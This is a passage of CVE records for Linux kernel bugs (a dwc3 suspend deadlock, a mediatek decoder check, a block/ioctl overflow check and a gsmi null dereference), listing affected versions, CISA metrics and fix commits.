"title": "drm/radeon: check bo_va-\u003ebo is non-NULL before using it",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41060",
"datePublished": "2024-07-29T14:57:22.499Z",
"dateReserved": "2024-07-12T12:17:45.627Z",
"dateUpdated": "2025-05-04T09:21:11.890Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42085 (GCVE-0-2024-42085)
Vulnerability from cvelistv5
Published
2024-07-29 16:26
Modified
2025-08-28 14:42
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: dwc3: core: remove lock of otg mode during gadget suspend/resume to avoid deadlock
When config CONFIG_USB_DWC3_DUAL_ROLE is selected, and trigger system
to enter suspend status with below command:
echo mem > /sys/power/state
There will be a deadlock issue occurring. Detailed invoking path as
below:
dwc3_suspend_common()
spin_lock_irqsave(&dwc->lock, flags); <-- 1st
dwc3_gadget_suspend(dwc);
dwc3_gadget_soft_disconnect(dwc);
spin_lock_irqsave(&dwc->lock, flags); <-- 2nd
This issue is exposed by commit c7ebd8149ee5 ("usb: dwc3: gadget: Fix
NULL pointer dereference in dwc3_gadget_suspend") that removes the code
of checking whether dwc->gadget_driver is NULL or not. It causes the
following code is executed and deadlock occurs when trying to get the
spinlock. In fact, the root cause is the commit 5265397f9442("usb: dwc3:
Remove DWC3 locking during gadget suspend/resume") that forgot to remove
the lock of otg mode. So, remove the redundant lock of otg mode during
gadget suspend/resume.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f2bfd0a2a640ca2f308b6893a89cfb2ec31e8fde Version: 2fa487a9466760a4fb6f147aed6219379dabfc2e Version: 5265397f94424eaea596026fd34dc7acf474dcec Version: 5265397f94424eaea596026fd34dc7acf474dcec Version: 5265397f94424eaea596026fd34dc7acf474dcec Version: 5265397f94424eaea596026fd34dc7acf474dcec |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.178Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7026576e89094aa9a0062aa6d10cba18aa99944c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d77e2b5104c51d3668b9717c825a4a06998efe63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17e2956633ca560b95f1cbbb297cfc2adf650649"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f1274cfab183e69a7c7bafffcb4f50703c876276"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7838de15bb700c2898a7d741db9b1f3cbc86c136"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42085",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:57.338012Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:57.102Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/dwc3/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8731a0b180f6b5d52397c7aeea6eda9511a467a7",
"status": "affected",
"version": "f2bfd0a2a640ca2f308b6893a89cfb2ec31e8fde",
"versionType": "git"
},
{
"lessThan": "7026576e89094aa9a0062aa6d10cba18aa99944c",
"status": "affected",
"version": "2fa487a9466760a4fb6f147aed6219379dabfc2e",
"versionType": "git"
},
{
"lessThan": "d77e2b5104c51d3668b9717c825a4a06998efe63",
"status": "affected",
"version": "5265397f94424eaea596026fd34dc7acf474dcec",
"versionType": "git"
},
{
"lessThan": "17e2956633ca560b95f1cbbb297cfc2adf650649",
"status": "affected",
"version": "5265397f94424eaea596026fd34dc7acf474dcec",
"versionType": "git"
},
{
"lessThan": "f1274cfab183e69a7c7bafffcb4f50703c876276",
"status": "affected",
"version": "5265397f94424eaea596026fd34dc7acf474dcec",
"versionType": "git"
},
{
"lessThan": "7838de15bb700c2898a7d741db9b1f3cbc86c136",
"status": "affected",
"version": "5265397f94424eaea596026fd34dc7acf474dcec",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/dwc3/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "5.15.128",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: core: remove lock of otg mode during gadget suspend/resume to avoid deadlock\n\nWhen config CONFIG_USB_DWC3_DUAL_ROLE is selected, and trigger system\nto enter suspend status with below command:\necho mem \u003e /sys/power/state\nThere will be a deadlock issue occurring. Detailed invoking path as\nbelow:\ndwc3_suspend_common()\n spin_lock_irqsave(\u0026dwc-\u003elock, flags); \u003c-- 1st\n dwc3_gadget_suspend(dwc);\n dwc3_gadget_soft_disconnect(dwc);\n spin_lock_irqsave(\u0026dwc-\u003elock, flags); \u003c-- 2nd\nThis issue is exposed by commit c7ebd8149ee5 (\"usb: dwc3: gadget: Fix\nNULL pointer dereference in dwc3_gadget_suspend\") that removes the code\nof checking whether dwc-\u003egadget_driver is NULL or not. It causes the\nfollowing code is executed and deadlock occurs when trying to get the\nspinlock. In fact, the root cause is the commit 5265397f9442(\"usb: dwc3:\nRemove DWC3 locking during gadget suspend/resume\") that forgot to remove\nthe lock of otg mode. So, remove the redundant lock of otg mode during\ngadget suspend/resume."
}
],
"providerMetadata": {
"dateUpdated": "2025-08-28T14:42:41.986Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8731a0b180f6b5d52397c7aeea6eda9511a467a7"
},
{
"url": "https://git.kernel.org/stable/c/7026576e89094aa9a0062aa6d10cba18aa99944c"
},
{
"url": "https://git.kernel.org/stable/c/d77e2b5104c51d3668b9717c825a4a06998efe63"
},
{
"url": "https://git.kernel.org/stable/c/17e2956633ca560b95f1cbbb297cfc2adf650649"
},
{
"url": "https://git.kernel.org/stable/c/f1274cfab183e69a7c7bafffcb4f50703c876276"
},
{
"url": "https://git.kernel.org/stable/c/7838de15bb700c2898a7d741db9b1f3cbc86c136"
}
],
"title": "usb: dwc3: core: remove lock of otg mode during gadget suspend/resume to avoid deadlock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42085",
"datePublished": "2024-07-29T16:26:26.284Z",
"dateReserved": "2024-07-29T15:50:41.170Z",
"dateUpdated": "2025-08-28T14:42:41.986Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43831 (GCVE-0-2024-43831)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: mediatek: vcodec: Handle invalid decoder vsi
Handle an invalid decoder vsi in vpu_dec_init to ensure the decoder vsi
is valid for future use.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43831",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:08:27.988158Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:23.652Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/mediatek/vcodec/decoder/vdec_vpu_if.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dbd3e4adb98e50ede74f00b3fa956fa29ef95e6c",
"status": "affected",
"version": "590577a4e5257ac3ed72999a94666ad6ba8f24bc",
"versionType": "git"
},
{
"lessThan": "1c109f23b271a02b9bb195c173fab41e3285a8db",
"status": "affected",
"version": "590577a4e5257ac3ed72999a94666ad6ba8f24bc",
"versionType": "git"
},
{
"lessThan": "cdf05ae76198c513836bde4eb55f099c44773280",
"status": "affected",
"version": "590577a4e5257ac3ed72999a94666ad6ba8f24bc",
"versionType": "git"
},
{
"lessThan": "59d438f8e02ca641c58d77e1feffa000ff809e9f",
"status": "affected",
"version": "590577a4e5257ac3ed72999a94666ad6ba8f24bc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/mediatek/vcodec/decoder/vdec_vpu_if.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.131",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.131",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mediatek: vcodec: Handle invalid decoder vsi\n\nHandle an invalid decoder vsi in vpu_dec_init to ensure the decoder vsi\nis valid for future use."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:14.060Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dbd3e4adb98e50ede74f00b3fa956fa29ef95e6c"
},
{
"url": "https://git.kernel.org/stable/c/1c109f23b271a02b9bb195c173fab41e3285a8db"
},
{
"url": "https://git.kernel.org/stable/c/cdf05ae76198c513836bde4eb55f099c44773280"
},
{
"url": "https://git.kernel.org/stable/c/59d438f8e02ca641c58d77e1feffa000ff809e9f"
}
],
"title": "media: mediatek: vcodec: Handle invalid decoder vsi",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43831",
"datePublished": "2024-08-17T09:21:49.593Z",
"dateReserved": "2024-08-17T09:11:59.273Z",
"dateUpdated": "2025-05-04T09:27:14.060Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41000 (GCVE-0-2024-41000)
Vulnerability from cvelistv5
Published
2024-07-12 12:37
Modified
2025-05-04 09:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
block/ioctl: prefer different overflow check
Running syzkaller with the newly reintroduced signed integer overflow
sanitizer shows this report:
[ 62.982337] ------------[ cut here ]------------
[ 62.985692] cgroup: Invalid name
[ 62.986211] UBSAN: signed-integer-overflow in ../block/ioctl.c:36:46
[ 62.989370] 9pnet_fd: p9_fd_create_tcp (7343): problem connecting socket to 127.0.0.1
[ 62.992992] 9223372036854775807 + 4095 cannot be represented in type 'long long'
[ 62.997827] 9pnet_fd: p9_fd_create_tcp (7345): problem connecting socket to 127.0.0.1
[ 62.999369] random: crng reseeded on system resumption
[ 63.000634] GUP no longer grows the stack in syz-executor.2 (7353): 20002000-20003000 (20001000)
[ 63.000668] CPU: 0 PID: 7353 Comm: syz-executor.2 Not tainted 6.8.0-rc2-00035-gb3ef86b5a957 #1
[ 63.000677] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 63.000682] Call Trace:
[ 63.000686] <TASK>
[ 63.000731] dump_stack_lvl+0x93/0xd0
[ 63.000919] __get_user_pages+0x903/0xd30
[ 63.001030] __gup_longterm_locked+0x153e/0x1ba0
[ 63.001041] ? _raw_read_unlock_irqrestore+0x17/0x50
[ 63.001072] ? try_get_folio+0x29c/0x2d0
[ 63.001083] internal_get_user_pages_fast+0x1119/0x1530
[ 63.001109] iov_iter_extract_pages+0x23b/0x580
[ 63.001206] bio_iov_iter_get_pages+0x4de/0x1220
[ 63.001235] iomap_dio_bio_iter+0x9b6/0x1410
[ 63.001297] __iomap_dio_rw+0xab4/0x1810
[ 63.001316] iomap_dio_rw+0x45/0xa0
[ 63.001328] ext4_file_write_iter+0xdde/0x1390
[ 63.001372] vfs_write+0x599/0xbd0
[ 63.001394] ksys_write+0xc8/0x190
[ 63.001403] do_syscall_64+0xd4/0x1b0
[ 63.001421] ? arch_exit_to_user_mode_prepare+0x3a/0x60
[ 63.001479] entry_SYSCALL_64_after_hwframe+0x6f/0x77
[ 63.001535] RIP: 0033:0x7f7fd3ebf539
[ 63.001551] Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 14 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
[ 63.001562] RSP: 002b:00007f7fd32570c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001
[ 63.001584] RAX: ffffffffffffffda RBX: 00007f7fd3ff3f80 RCX: 00007f7fd3ebf539
[ 63.001590] RDX: 4db6d1e4f7e43360 RSI: 0000000020000000 RDI: 0000000000000004
[ 63.001595] RBP: 00007f7fd3f1e496 R08: 0000000000000000 R09: 0000000000000000
[ 63.001599] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[ 63.001604] R13: 0000000000000006 R14: 00007f7fd3ff3f80 R15: 00007ffd415ad2b8
...
[ 63.018142] ---[ end trace ]---
Historically, the signed integer overflow sanitizer did not work in the
kernel due to its interaction with `-fwrapv` but this has since been
changed [1] in the newest version of Clang; It was re-enabled in the
kernel with Commit 557f8c582a9ba8ab ("ubsan: Reintroduce signed overflow
sanitizer").
Let's rework this overflow checking logic to not actually perform an
overflow during the check itself, thus avoiding the UBSAN splat.
[1]: https://github.com/llvm/llvm-project/pull/82432
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:55.991Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/58706e482bf45c4db48b0c53aba2468c97adda24"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3220c90f4dbdc6d20d0608b164d964434a810d66"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61ec76ec930709b7bcd69029ef1fe90491f20cf9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd841ee01fb4a79cb7f5cc424b5c96c3a73b2d1e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54160fb1db2de367485f21e30196c42f7ee0be4e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ccb326b5f9e623eb7f130fbbf2505ec0e2dcaff9"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41000",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:01:19.374759Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:19.237Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "58706e482bf45c4db48b0c53aba2468c97adda24",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3220c90f4dbdc6d20d0608b164d964434a810d66",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "61ec76ec930709b7bcd69029ef1fe90491f20cf9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fd841ee01fb4a79cb7f5cc424b5c96c3a73b2d1e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "54160fb1db2de367485f21e30196c42f7ee0be4e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ccb326b5f9e623eb7f130fbbf2505ec0e2dcaff9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.96",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.36",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.96",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock/ioctl: prefer different overflow check\n\nRunning syzkaller with the newly reintroduced signed integer overflow\nsanitizer shows this report:\n\n[ 62.982337] ------------[ cut here ]------------\n[ 62.985692] cgroup: Invalid name\n[ 62.986211] UBSAN: signed-integer-overflow in ../block/ioctl.c:36:46\n[ 62.989370] 9pnet_fd: p9_fd_create_tcp (7343): problem connecting socket to 127.0.0.1\n[ 62.992992] 9223372036854775807 + 4095 cannot be represented in type \u0027long long\u0027\n[ 62.997827] 9pnet_fd: p9_fd_create_tcp (7345): problem connecting socket to 127.0.0.1\n[ 62.999369] random: crng reseeded on system resumption\n[ 63.000634] GUP no longer grows the stack in syz-executor.2 (7353): 20002000-20003000 (20001000)\n[ 63.000668] CPU: 0 PID: 7353 Comm: syz-executor.2 Not tainted 6.8.0-rc2-00035-gb3ef86b5a957 #1\n[ 63.000677] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 63.000682] Call Trace:\n[ 63.000686] \u003cTASK\u003e\n[ 63.000731] dump_stack_lvl+0x93/0xd0\n[ 63.000919] __get_user_pages+0x903/0xd30\n[ 63.001030] __gup_longterm_locked+0x153e/0x1ba0\n[ 63.001041] ? _raw_read_unlock_irqrestore+0x17/0x50\n[ 63.001072] ? try_get_folio+0x29c/0x2d0\n[ 63.001083] internal_get_user_pages_fast+0x1119/0x1530\n[ 63.001109] iov_iter_extract_pages+0x23b/0x580\n[ 63.001206] bio_iov_iter_get_pages+0x4de/0x1220\n[ 63.001235] iomap_dio_bio_iter+0x9b6/0x1410\n[ 63.001297] __iomap_dio_rw+0xab4/0x1810\n[ 63.001316] iomap_dio_rw+0x45/0xa0\n[ 63.001328] ext4_file_write_iter+0xdde/0x1390\n[ 63.001372] vfs_write+0x599/0xbd0\n[ 63.001394] ksys_write+0xc8/0x190\n[ 63.001403] do_syscall_64+0xd4/0x1b0\n[ 63.001421] ? arch_exit_to_user_mode_prepare+0x3a/0x60\n[ 63.001479] entry_SYSCALL_64_after_hwframe+0x6f/0x77\n[ 63.001535] RIP: 0033:0x7f7fd3ebf539\n[ 63.001551] Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 14 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\n[ 63.001562] RSP: 002b:00007f7fd32570c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[ 63.001584] RAX: ffffffffffffffda RBX: 00007f7fd3ff3f80 RCX: 00007f7fd3ebf539\n[ 63.001590] RDX: 4db6d1e4f7e43360 RSI: 0000000020000000 RDI: 0000000000000004\n[ 63.001595] RBP: 00007f7fd3f1e496 R08: 0000000000000000 R09: 0000000000000000\n[ 63.001599] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\n[ 63.001604] R13: 0000000000000006 R14: 00007f7fd3ff3f80 R15: 00007ffd415ad2b8\n...\n[ 63.018142] ---[ end trace ]---\n\nHistorically, the signed integer overflow sanitizer did not work in the\nkernel due to its interaction with `-fwrapv` but this has since been\nchanged [1] in the newest version of Clang; It was re-enabled in the\nkernel with Commit 557f8c582a9ba8ab (\"ubsan: Reintroduce signed overflow\nsanitizer\").\n\nLet\u0027s rework this overflow checking logic to not actually perform an\noverflow during the check itself, thus avoiding the UBSAN splat.\n\n[1]: https://github.com/llvm/llvm-project/pull/82432"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:19:48.175Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/58706e482bf45c4db48b0c53aba2468c97adda24"
},
{
"url": "https://git.kernel.org/stable/c/3220c90f4dbdc6d20d0608b164d964434a810d66"
},
{
"url": "https://git.kernel.org/stable/c/61ec76ec930709b7bcd69029ef1fe90491f20cf9"
},
{
"url": "https://git.kernel.org/stable/c/fd841ee01fb4a79cb7f5cc424b5c96c3a73b2d1e"
},
{
"url": "https://git.kernel.org/stable/c/54160fb1db2de367485f21e30196c42f7ee0be4e"
},
{
"url": "https://git.kernel.org/stable/c/ccb326b5f9e623eb7f130fbbf2505ec0e2dcaff9"
}
],
"title": "block/ioctl: prefer different overflow check",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41000",
"datePublished": "2024-07-12T12:37:41.189Z",
"dateReserved": "2024-07-12T12:17:45.608Z",
"dateUpdated": "2025-05-04T09:19:48.175Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52893 (GCVE-0-2023-52893)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
gsmi: fix null-deref in gsmi_get_variable
We can get EFI variables without fetching the attribute, so we must
allow for that in gsmi.
commit 859748255b43 ("efi: pstore: Omit efivars caching EFI varstore
access layer") added a new get_variable call with attr=NULL, which
triggers panic in gsmi.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 74c5b31c6618f01079212332b2e5f6c42f2d6307 Version: 74c5b31c6618f01079212332b2e5f6c42f2d6307 Version: 74c5b31c6618f01079212332b2e5f6c42f2d6307 Version: 74c5b31c6618f01079212332b2e5f6c42f2d6307 Version: 74c5b31c6618f01079212332b2e5f6c42f2d6307 Version: 74c5b31c6618f01079212332b2e5f6c42f2d6307 Version: 74c5b31c6618f01079212332b2e5f6c42f2d6307 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52893",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:53.149409Z",
